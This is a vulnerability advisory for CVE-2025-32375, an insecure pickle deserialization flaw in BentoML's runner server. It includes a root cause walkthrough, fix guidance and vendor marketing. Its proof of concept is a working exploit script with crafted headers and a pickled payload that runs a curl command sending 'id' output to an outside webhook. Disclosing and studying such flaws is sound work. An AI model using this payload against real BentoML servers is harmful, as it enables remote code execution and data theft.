Summary
There was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.
PoC
- First, create a file named model.py to create a simple model and save it
import bentoml
import numpy as np
class mymodel:
def predict(self, info):
return np.abs(info)
def __call__(self, info):
return self.predict(info)
model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)
- Then run the following command to save this model
python3 model.py
- Next, create bentofile.yaml to build this model
service: "service.py"
description: "A model serving service with BentoML"
python:
packages:
- bentoml
- numpy
models:
- tag: MyModel:latest
include:
- "*.py"
- Then, create service.py to host this model
import bentoml
from bentoml.io import NumpyNdarray
import numpy as np
model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()
svc = bentoml.Service("myservice", runners=[model_runner])
async def predict(input_data: np.ndarray):
input_columns = np.split(input_data, input_data.shape[1], axis=1)
result_generator = model_runner.async_run(input_columns, is_stream=True)
async for result in result_generator:
yield result
- Then, run the following commands to build and host this model
bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888
- Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML's runner server.
import requests
import pickle
url = "http://0.0.0.0:8888/"
headers = {
"args-number": "1",
"Content-Type": "application/vnd.bentoml.pickled",
"Payload-Container": "NdarrayContainer",
"Payload-Meta": '{"format": "default"}',
"Batch-Size": "-1",
}
class P:
def __reduce__(self):
return (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))
response = requests.post(url, headers=headers, data=pickle.dumps(P()))
print(response)
And I can replace the NdarrayContainer with PandasDataFrameContainer in Payload-Container header and the exploit still working.
After running exploit.py then the output of the command id will be send out to the WebHook server.
Root Cause Analysis:
- When handling a request in BentoML runner server in
src/bentoml/_internal/server/runner_app.py, when the request headerargs-numberis equal to 1, it will call the function_deserialize_single_paramlike the code below:
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
assert self._is_ready
arg_num = int(request.headers["args-number"])
r_: bytes = await request.body()
if arg_num == 1:
params: Params[t.Any] = _deserialize_single_param(request, r_)
- Then this is the function of
_deserialize_single_param, which will take the value of all request headers ofPayload-Container,Payload-MetaandBatch-Sizeand the crafted intoPayloadclass which will contain the data fromrequest.body
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
container = request.headers["Payload-Container"]
meta = json.loads(request.headers["Payload-Meta"])
batch_size = int(request.headers["Batch-Size"])
kwarg_name = request.headers.get("Kwarg-Name")
payload = Payload(
data=bs,
meta=meta,
batch_size=batch_size,
container=container,
)
if kwarg_name:
d = {kwarg_name: payload}
params: Params[t.Any] = Params(**d)
else:
params: Params[t.Any] = Params(payload)
return params
- After crafting
Paramscontaining payload, it will call to functioninferwithparamsvariable as input
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
payload = await infer(params)
- Inside function
infer, theparamsvariable with is belong to classParamswill call the functionmapof that class withAutoContainer.from_payloadas a parameter.
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
params = params.map(AutoContainer.from_payload)
try:
ret = await runner_method.async_run(
*params.args, **params.kwargs
)
except Exception:
traceback.print_exc()
raise
return AutoContainer.to_payload(ret, 0)
- Inside class
Paramsdefine the functionmapwhich will call theAutoContainer.from_payloadfunction with arguments, which aredata,meta,batch_sizeandcontainer
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
"""
Apply a function to all the values in the Params and return a Params of the
return values.
"""
args = tuple(function(a) for a in self.args)
kwargs = {k: function(v) for k, v in self.kwargs.items()}
return Params[To](*args, **kwargs)
- Inside class
AutoContainerclass have defined the functionfrom_payloadwhich will find the class by thepayload.container, which is the value of headerPayload-Container, and it will call the functionfrom_payloadfrom the chosen class as return value
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
container_cls = DataContainerRegistry.find_by_name(payload.container)
return container_cls.from_payload(payload)
And if the attacker set value of header Payload-Container to NdarrayContainer or PandasDataFrameContainer, it will call from_payload and when it then check if the payload.meta["format"] == "default" it will call pickle.loads(payload.data) and payload.meta["format"] is the value of header Payload-Meta and the attacker can set it to {"format": "default"} and payload.data is the value of request.body which is the payload from malicious class P in my request, which will trigger __reduce__ method and then execute arbitrary commands (for my example is the curl command)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
cls,
payload: Payload,
) -> ext.PdDataFrame:
if payload.meta["format"] == "default":
return pickle.loads(payload.data)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
cls,
payload: Payload,
) -> ext.NpNDArray:
format = payload.meta.get("format", "default")
if format == "default":
return pickle.loads(payload.data)
Impact
In the above Proof of Concept, I have shown how the attacker can execute command id and send the output of the command to the outside. By replacing id command with any OS commands, this insecure deserialization in BentoML's runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.
Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.
CVE-2025-32375 has a CVSS score of 9.8 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.4.8); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-32375? CVE-2025-32375 is a critical-severity insecure deserialization vulnerability in bentoml (pip), affecting versions >= 1.0.0a1, < 1.4.8. It is fixed in 1.4.8. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
- How severe is CVE-2025-32375? CVE-2025-32375 has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of bentoml are affected by CVE-2025-32375? bentoml (pip) versions >= 1.0.0a1, < 1.4.8 is affected.
- Is there a fix for CVE-2025-32375? Yes. CVE-2025-32375 is fixed in 1.4.8. Upgrade to this version or later.
- Is CVE-2025-32375 exploitable, and should I be worried? Whether CVE-2025-32375 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-32375 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-32375? Upgrade
bentomlto 1.4.8 or later.